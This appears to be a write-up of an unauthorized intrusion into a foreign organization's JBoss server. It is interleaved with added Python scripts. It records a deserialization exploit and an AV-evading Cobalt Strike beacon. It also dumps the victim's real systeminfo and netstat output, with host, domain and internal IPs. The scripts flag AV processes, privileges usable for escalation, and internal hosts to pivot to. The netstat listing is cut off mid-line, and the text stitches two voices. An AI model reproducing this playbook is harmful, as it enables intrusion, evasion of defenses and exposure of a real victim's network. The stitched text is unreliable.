
Title: A record of an intranet lateral-movement test with AV evasion


Tool Preparation

jexboss

Kali Linux

CS 4.3

Windows AV online lookup 1

Windows AV online lookup 2

Windows AV online lookup 3

fscan

Tide shellcode AV evasion

LSTAR

Other plugins for CobaltStrike

PEASS-ng

PrintSpoofer

Internet-facing service

1. To practice lateral movement inside an intranet, quietly picked foreign sites as targets.

2. Found that the JBoss site has a deserialization vulnerability, but jexboss could not exploit it successfully:

python jexboss.py -u https://xx.xx.xx/

3. Exploited it successfully with 6 brother's "ultimate deserialization test tool".


4. Check the current user: whoami. An ordinary (non-administrator) user.


5. Check the IP address: ipconfig


6. Check whether AV software is present: tasklist /svc


7. Paste the process list into a Windows AV online lookup; it shows that AV software is present.


8. Check whether the server has outbound Internet access: ping www.baidu.com. Good, the server can reach the Internet.

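Steps 6 and 7 identify AV by dumping tasklist /svc and pasting it into an online lookup. The same check can be done offline against a local table of known AV/EDR process names, which also avoids handing a target's process list to a third-party website. The script below is an added example, not code from the original post: its KNOWN_AV table is a short illustrative subset (assumption, not a complete list), and the tasklist output it parses is constructed for the example, not taken from the target.

```python
"""Spot AV/EDR processes in `tasklist /svc` output offline (added example).

The tasklist output below is constructed for the example, not the target's,
and KNOWN_AV is a short illustrative table, not a complete list.
"""
import re

KNOWN_AV = {  # lower-cased image name -> product
    "msmpeng.exe": "Windows Defender (Antimalware Service Executable)",
    "nissrv.exe": "Windows Defender (Network Inspection Service)",
    "sentinelagent.exe": "SentinelOne",
    "csfalconservice.exe": "CrowdStrike Falcon",
    "ekrn.exe": "ESET",
    "avp.exe": "Kaspersky",
    "ccsvchst.exe": "Symantec Endpoint Protection",
    "mcshield.exe": "McAfee",
    "bdagent.exe": "Bitdefender",
    "360tray.exe": "360 Total Security",
}

HEADER = re.compile(r"^Image Name\s+PID\s+Services", re.I)
# image name (may contain spaces), right-aligned PID, then the service list
ROW = re.compile(r"^(?P<image>\S.*?)\s+(?P<pid>\d+)\s+(?P<svc>.*)$")

# Constructed sample in the exact layout `tasklist /svc` prints on an English system.
SAMPLE_TASKLIST = """\

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
svchost.exe                    600 RpcEptMapper, RpcSs
svchost.exe                    832 BFE, CoreMessagingRegistrar, mpssvc,
                                   SystemEventsBroker, Winmgmt
MsMpEng.exe                   2180 WinDefend
SentinelAgent.exe             4120 SentinelAgent
java.exe                      7600 N/A
"""


def _services(field):
    """Split 'A, B, C,' into ['A', 'B', 'C']; 'N/A' means the process hosts no service."""
    field = field.strip()
    return [] if field in ("", "N/A") else [s.strip() for s in field.split(",") if s.strip()]


def parse_tasklist(text):
    """Return one dict per process: image, pid, services (wrapped service lines are rejoined)."""
    procs = []
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line or HEADER.match(line) or line.startswith("="):
            continue
        if raw[0].isspace() and procs:
            # tasklist wraps long service lists onto indented continuation lines
            procs[-1]["services"].extend(_services(line))
            continue
        m = ROW.match(line)
        if m:
            procs.append({"image": m["image"], "pid": int(m["pid"]),
                          "services": _services(m["svc"])})
    return procs


def find_av(text):
    """Processes whose image name is in KNOWN_AV, each annotated with the product name."""
    return [dict(p, product=KNOWN_AV[p["image"].lower()])
            for p in parse_tasklist(text) if p["image"].lower() in KNOWN_AV]


if __name__ == "__main__":
    # On a real box: tasklist /svc > tl.txt, then feed the file contents to find_av().
    for hit in find_av(SAMPLE_TASKLIST):
        print(f'{hit["image"]:<22} PID {hit["pid"]:<6} {hit["product"]}  services={hit["services"]}')
```

The matching is by image name only; a renamed or unlisted agent is missed, so an empty result means "nothing recognised", not "no AV". Treat it as a first pass and still check services (sc query) and loaded drivers before deciding on a payload.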

Getting CS online

1. Because AV software is present, we have to think about bypassing it; uploading the CS payload directly will definitely not work. This time the Tide shellcode AV-evasion service was used: many of the Python-packed exe files on GitHub are too large and upload very slowly, while the Tide shellcode evasion output is smaller and uploads faster.

2. Generate C-format shellcode in CS


3. Paste the shellcode into the Tide website, upload the generated exe to the target machine, and then execute it:

C:\usr\desarrollo\jboss-5.1.0.GA\server\sigAmeServer\deploy\ROOT.war\TideAv-Go1-2023-02-04-10-31-21-221261.exe tide


4. The CS beacon comes online successfully


Privilege escalation

Information Collection

1. View the current user and privileges

whoami

whoami /priv

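What matters in whoami /priv is which held privileges open an escalation path. PrintSpoofer, in the tool list above, relies on SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege), which service accounts running application servers commonly hold. The script below is an added example, not code from the post: it parses whoami /priv output and flags the privileges that are usually actionable. The output it parses is constructed, not the target's, and the Spanish state words it accepts (Habilitada/Deshabilitada) are an assumption for the target's es-MX locale. A privilege listed as Disabled is still held by the token and can be enabled by the process with AdjustTokenPrivileges, so held privileges are reported with their state rather than dropped.

```python
"""Flag held token privileges that open a local escalation path (added example).

Parses `whoami /priv` output. The sample is constructed, not the target's.
The Spanish state words are an assumption for an es-MX Windows.
"""
import re

# Standard Windows token privileges and the usual way each one is abused.
INTERESTING = {
    "SeImpersonatePrivilege": "token impersonation: PrintSpoofer / *Potato family",
    "SeAssignPrimaryTokenPrivilege": "token impersonation: PrintSpoofer / *Potato family",
    "SeDebugPrivilege": "open any process, e.g. dump LSASS",
    "SeBackupPrivilege": "read any file, e.g. SAM and SYSTEM hives",
    "SeRestorePrivilege": "write any file or registry key",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load a (signed) kernel driver",
}

# English, plus the Spanish wording assumed for the target's locale.
ENABLED = {"enabled", "habilitada", "habilitado"}
DISABLED = {"disabled", "deshabilitada", "deshabilitado"}

# privilege name, free-text description, state (the last token on the line)
ROW = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(\S+)$")

# Constructed sample, typical of a service account's token.
SAMPLE_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_privs(text):
    """Return {privilege: state}; state is normalised to 'Enabled'/'Disabled' when recognised,
    otherwise the raw word is kept so an unknown locale is visible rather than silently wrong."""
    privs = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        raw = m.group(3).lower()
        state = "Enabled" if raw in ENABLED else "Disabled" if raw in DISABLED else m.group(3)
        privs[m.group(1)] = state
    return privs


def escalation_candidates(text):
    """Held privileges from INTERESTING, with their current state (Disabled is still held)."""
    return [{"privilege": p, "state": s, "use": INTERESTING[p]}
            for p, s in parse_privs(text).items() if p in INTERESTING]


if __name__ == "__main__":
    # On a real box: whoami /priv > priv.txt, then feed the file contents in.
    for c in escalation_candidates(SAMPLE_PRIV):
        print(f'{c["privilege"]:<32} {c["state"]:<9} {c["use"]}')
```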

2. View system version and patch information

systeminfo


Host Name:                 AMEPROWEBEGAD
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19044 N/A Build 19044
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          appzusr
Registered Organization:
Product ID:                00331-10000-00001-AA727
Original Install Date:     13/5/2022, 14:03:47
System Boot Time:          1/2/2023, 16:50:29
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2494 Mhz
                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2494 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/11/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             es-mx;Spanish (Mexico)
Input Locale:              es-mx;Spanish (Mexico)
Time Zone:                 (UTC-06:00) Guadalajara, Mexico City, Monterrey
Total Physical Memory:     4,095 MB
Available Physical Memory: 1,201 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 1,147 MB
Virtual Memory: In Use:    3,652 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    ame.local
Logon Server:              \\AMEPROWEBEGAD
Hotfix(s):                 4 Hotfix(s) Installed.
                           [01]: KB5004331
                           [02]: KB5003791
                           [03]: KB5006670
                           [04]: KB5005699
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 172.16.2.100
                                 [02]: fe80::591:ae09:eee1:888e
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

3. View open ports and services: netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       600
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1090           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:1098           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:1099           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1072
  TCP    0.0.0.0:3873           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:4445           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:4446           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:4457           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:4712           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:4713           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       6652
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:7070           0.0.0.0:0              LISTENING       3564
  TCP    0.0.0.0:8009           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:8083           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:46305          0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       832
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       680
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1416
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1612
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       2452
  TCP    0.0.0.0:49671          0.0.0.0:0              LISTENING       832
  TCP    0.0.0.0:49672          0.0.0.0:0              LISTENING       3404
  TCP    0.0.0.0:49704          0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:49708          0.0.0.0:0              LISTENING       3048
  TCP    0.0.0.0:51407          0.0.0.0:0              LISTENING       7600
  TCP    127.0.0.1:5140         0.0.0.0:0              LISTENING       7172
  TCP    127.0.0.1:51411        0.0.0.0:0              LISTENING       7600
  TCP    172.16.2.100:139       0.0.0.0:0              LISTENING       4
  TCP    172.16.2.100:8080      172.16.12.34:42602     TIME_WAIT       0
  TCP    172.16.2.100:8080      172.16.12.34:42610     ESTABLISHED     7600
  TCP    172.16.2.100:8080      172.16.12.34:55672     TIME_WAIT       0
  TCP    172.16.2.100:8080      172.16.12.34:55686     TIME_WAIT       0
  TCP    172.16.2.100:49717     38.90.226.62:8883      ESTABLISHED     3576
  TCP    172.16.2.100:50848     172.16.2.100:51407     TIME_WAIT       0
  TCP    172.16.2.100:51413     172.16.2.190:1433      ESTABLISHED     7600
  TCP    172.16.2.100:51447     172.16.2.190:1433      ESTABLISHED     7600
  TCP    172.16.2.100:56063     172.16.2.11:2222       ESTABLISHED     3576
  TCP    172.16.2.100:56538     92.223.66.48:443       ESTABLISHED     3564
  TCP    [::]:135               [::]:0                 LISTENING       600
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:1090              [::]:0                 LISTENING       7600
  TCP    [::]:1098              [::]:0                 LISTENING       7600
  TCP    [::]:1099              [::]:0                 LISTENING       7600
  TCP    [::]:3389              [::]:0                 LISTENING       1072
  TCP    [::]:3873              [::]:0                 LISTENING       7600
  TCP    [::]:4444              [::]:0                 LISTENING       7600
  TCP    [::]:4445              [::]:0                 LISTENING       7600
  TCP    [::]:4446              [::]:0                 LISTENING       7600
  TCP    [::]:4457              [::]:0                 LISTENING       7600
  TCP    [::]:4712              [::]:0                 LISTENING       7600
  TCP    [::]:4713              [::]:0                 LISTENING       7600
  TCP    [::]:5985
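The netstat -ano dump above is dense but tells most of the lateral-movement story on its own: PID 7600 (the JBoss process) listens on 1090/1098/1099 (JMX/RMI/JNDI), 3873, 4444-4446 (the JBoss 5 invokers), 8009 (AJP), 8080 and 8083, and holds established connections to 172.16.2.190:1433 (the default MSSQL port); another process reaches 172.16.2.11:2222; and two processes hold connections to Internet hosts on 443 and 8883 (the MQTT-over-TLS default port), which already proves egress without a ping. The script below is an added example, not code from the original post: it parses netstat -ano output and separates listening ports per PID, inbound clients, internal hosts this box talks to (pivot candidates), and external peers. Its sample is an excerpt of the lines above plus one constructed UDP line; a TCP peer counts as inbound when the local port is one the same PID is listening on, everything else established is outbound.

```python
"""Triage `netstat -ano` output: listeners per PID, inbound clients, internal and external peers.

Added example. SAMPLE_NETSTAT is an excerpt of the target's netstat output from the
post plus one constructed UDP line (PID 1234), which is not from the post.
"""
import ipaddress
from collections import defaultdict

SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       600
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1099           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1072
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8009           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       7600
  TCP    172.16.2.100:139       0.0.0.0:0              LISTENING       4
  TCP    172.16.2.100:8080      172.16.12.34:42610     ESTABLISHED     7600
  TCP    172.16.2.100:49717     38.90.226.62:8883      ESTABLISHED     3576
  TCP    172.16.2.100:50848     172.16.2.100:51407     TIME_WAIT       0
  TCP    172.16.2.100:51413     172.16.2.190:1433      ESTABLISHED     7600
  TCP    172.16.2.100:56063     172.16.2.11:2222       ESTABLISHED     3576
  TCP    172.16.2.100:56538     92.223.66.48:443       ESTABLISHED     3564
  TCP    [::]:135               [::]:0                 LISTENING       600
  TCP    [::]:8080              [::]:0                 LISTENING       7600
  UDP    0.0.0.0:123            *:*                                    1234
"""


def split_addr(addr):
    """'172.16.2.100:8080' -> ('172.16.2.100', 8080); '[::]:135' -> ('::', 135); '*:*' -> ('*', None)."""
    host, _, port = addr.rpartition(":")
    return host.strip("[]"), (int(port) if port.isdigit() else None)


def _is_private(host):
    """RFC 1918 / ULA / link-local per the ipaddress module; unparsable hosts count as external."""
    try:
        return ipaddress.ip_address(host.split("%")[0]).is_private
    except ValueError:
        return False


def parse_netstat(text):
    """One dict per TCP/UDP row; header lines and anything unexpected are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP":
            local, remote, state, pid = parts[1:]
        elif len(parts) == 4 and parts[0] == "UDP":      # UDP rows have no State column
            local, remote, pid = parts[1:]
            state = ""
        else:
            continue
        lhost, lport = split_addr(local)
        rhost, rport = split_addr(remote)
        records.append({"proto": parts[0], "lhost": lhost, "lport": lport,
                        "rhost": rhost, "rport": rport, "state": state, "pid": int(pid)})
    return records


def summarize(records):
    listening = defaultdict(set)                          # pid -> {(proto, port)}, v4/v6 deduplicated
    for r in records:
        if r["state"] == "LISTENING" or (r["proto"] == "UDP" and r["rhost"] == "*"):
            listening[r["pid"]].add((r["proto"], r["lport"]))

    inbound, internal, external = defaultdict(set), defaultdict(set), defaultdict(set)
    for r in records:
        if r["state"] != "ESTABLISHED" or r["rport"] is None:
            continue
        if r["rhost"] == r["lhost"] or r["rhost"].startswith("127.") or r["rhost"] == "::1":
            continue                                      # the host talking to itself
        peer = f'{r["rhost"]}:{r["rport"]}'
        if ("TCP", r["lport"]) in listening.get(r["pid"], ()):
            inbound[r["rhost"]].add(r["lport"])           # a client of one of this box's listeners
        elif _is_private(r["rhost"]):
            internal[peer].add(r["pid"])                  # internal hosts: lateral-movement candidates
        else:
            external[peer].add(r["pid"])                  # Internet peers: proves egress, and from which PID

    return {
        "listening": {pid: sorted(ports) for pid, ports in listening.items()},
        "inbound_clients": {h: sorted(p) for h, p in inbound.items()},
        "internal_targets": {k: sorted(v) for k, v in internal.items()},
        "external_peers": {k: sorted(v) for k, v in external.items()},
    }


if __name__ == "__main__":
    # On a real box: netstat -ano > ns.txt, then feed the file contents to parse_netstat().
    for section, rows in summarize(parse_netstat(SAMPLE_NETSTAT)).items():
        print(section)
        for key, value in sorted(rows.items(), key=str):
            print(f"  {key}: {value}")
```

Cross-reference the PIDs with tasklist /svc: the PID behind an established 1433 connection is the process whose configuration files hold the database credentials, and the PID that listens on 5985 (WinRM) or 3389 tells you which remote-administration paths are open on this host before you scan the rest of the /16.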
